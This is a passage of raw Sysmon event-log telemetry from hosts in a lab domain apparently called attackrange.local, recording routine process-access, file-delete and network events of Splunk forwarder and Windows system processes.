09:03:44.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.598{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-88F0-6151-FA79-00000000FC01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.598{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88F0-6151-FA79-00000000FC01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.577{5EBD8912-88F0-6151-FA79-00000000FC01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.029{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CC66E38347D5D64CDE8B2CA81404393,SHA256=3B312A0C358745DACE2DB5AD9C4AA5EEFC9627462EC291A09E831FDBBB65A0F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:43.470{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com51129-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.831{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88F1-6151-FC79-00000000FC01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.831{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.831{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.831{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.831{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.831{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-88F1-6151-FC79-00000000FC01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.815{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88F1-6151-FC79-00000000FC01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.801{5EBD8912-88F1-6151-FC79-00000000FC01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.762{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C1CEB15CA50DB396ED21D34A5FCAB30,SHA256=E2D7026B1430E09CB5519318734BCE113B661CBF19685B7EE0D19F44662DCB92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977120Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:45.484{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C73EF1809C51A0A014CA2F6A74EEE628,SHA256=E248C8A5CEDD7FB2CEE4730F3DAAF4FE742AFE467423C2AA6D1DB3C9A2B43A15,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.230{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88F1-6151-FB79-00000000FC01}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.230{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-88F1-6151-FB79-00000000FC01}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.230{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.230{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.230{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.230{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.230{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88F1-6151-FB79-00000000FC01}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.200{5EBD8912-88F1-6151-FB79-00000000FC01}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.098{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11947A35E6C293B03A4795A96A094013,SHA256=A645C3CE9C46F1913AFCBAB85A95A5961749BE00D62F36E8DCEF6A5705B96EBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977119Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:41.754{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59285-false10.0.1.12-8000- 23542300x80000000000000001048490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:46.764{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8DF06D283EAAE87FF5E0CB7FF8A7E77,SHA256=DF04F565A8B253F9DFACC415659C3BD1F9198DB36F9A918BF85C29D6020C2BE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977124Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:46.719{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D9EEB7422066A2056D292CE428196AE,SHA256=D13378889114AC8F296B21E487358ACD8952A1C66D8E08D8902BA33FDED1C18C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:46.217{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F1E699687043E4E9E3255563B3385D1,SHA256=BCC79FBF212447760D8E584ECFFF30F45D5F211F9A6F73416339CD0CE471C948,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:46.017{5EBD8912-88F1-6151-FC79-00000000FC01}60806040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977123Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:46.516{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 